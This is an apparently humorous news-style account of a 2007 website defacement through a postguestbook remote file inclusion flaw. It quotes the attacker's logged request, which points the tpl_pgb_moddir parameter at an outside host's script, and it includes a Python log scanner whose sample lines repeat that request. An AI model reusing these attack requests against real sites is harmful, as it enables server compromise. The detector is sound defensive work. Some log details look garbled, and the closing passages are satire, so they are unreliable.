A couple of days ago an unidentified Islamic group of Turkish hackers, called StarHack Group, attacked the web server of the Koh Phangan Island News website.
On Wednesday the 7th of March 2007, at precisely 20:18 hours and 52 seconds, an unknown attacker with the IP address of 126.96.36.199 executed an exploit for the postguestbook module with the following request:
188.8.131.52 - - [07/Mar/2007:20:18:52 +0100] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://184.108.40.206/.smile/kgb.c? HTTP/1.1" 200 1808 "-" "libwww-perl/5.79"
According to the most recent research, the attack was initiated by a so-called robot that searches google.com for specific vulnerable targets.
220.127.116.11 - - [08/Mar/2007:19:21:25 +0100] "GET /modules.php?op=modload&name=postguestbook&file=index HTTP/1.1" 302 - "http://www.google.com/search?q=%22by:+PostGuestbook%22+site:org&hl=en&client=firefox-a&rls=org.mozilla:en-US:official&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:18.104.22.168) Gecko/20060728 Firefox/22.214.171.124"
The exploit for the postguestbook module allows the hacker to include arbitrary PHP code from an external source and execute it with the local user rights of the Apache web server.
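The request shape logged above can be searched for in any Apache access log. The following is an added example, not part of the original report: it flags every request whose query parameter carries an absolute URL, the way tpl_pgb_moddir did, and goes slightly beyond the logged case by also catching percent-encoded values. The function name and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format: client, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself an absolute URL is the signature of a remote include.
REMOTE_URL_RE = re.compile(r'\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_attempts(lines):
    """Return one record per query parameter whose decoded value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Only the request target is inspected; a URL in the Referer field is normal.
        query = m['target'].partition('?')[2]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL_RE.match(value):
                hits.append({'ip': m['ip'], 'time': m['ts'], 'param': name,
                             'value': value, 'agent': m['agent'],
                             # 200 means the script answered: triage these first.
                             'served': m['status'] == '200'})
    return hits

# Constructed sample lines (documentation-range addresses), shaped like the entries above.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Mar/2007:20:18:52 +0100] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://192.0.2.10/.smile/kgb.c? HTTP/1.1" 200 1808 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [08/Mar/2007:19:21:25 +0100] "GET /modules.php?op=modload&name=postguestbook&file=index HTTP/1.1" 302 - "http://www.google.com/search?q=%22by:+PostGuestbook%22" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Mar/2007:02:11:40 +0100] "GET /index.php?page=http%3A%2F%2F192.0.2.10%2Fx.txt HTTP/1.1" 404 312 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [09/Mar/2007:08:00:01 +0100] "GET /index.php?page=styles/default HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```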
Finally, the hackers from StarHack Group were able to upload files into the web server directory and overwrite the index files on most domains, a technique called website defacing. Amongst the uploaded files from different internet sources were some pretty nice and powerful PHP scripts like c99shell and r57shell, as well as an IRC bot named Eggdrop and a small httpd binary to run a tiny web server. There were also a few tiny Perl scripts that open up a backdoor on a specific port on the server, where it listens and waits for further instructions.
Last but not least, a 720 MB movie file named Rosso Come Il Cielo was also illegally uploaded to the Phangan Island News web server. Unfortunately it is only in Italian, and subtitles are still missing.
Phangan Island News officials announced that no further serious damage was done to the server in the recent hacker attacks. All systems are up and running 24/7 with no further complications and will constantly be monitored by Phangan Island News Special Internet Security Task Force.
An informed source noted that human failure was again one of the major factors for the recent successful hacker attack.
The informed source added that system admin Becki Beckmann, who is responsible for securing the server with IP address 126.96.36.199, experienced a sudden and very strange memory loss due to some electrical blackouts while joining a brain improvement program at Phangan Island News research facilities.
Unfortunately Becki Beckmann still refuses to give any more official statements on the subject of human failure concerning the successful recent hacker attack.
Phangan Island News Headquarters still strictly denies the existence of any hidden research facilities here on Koh Phangan Island – The Island Of Madness.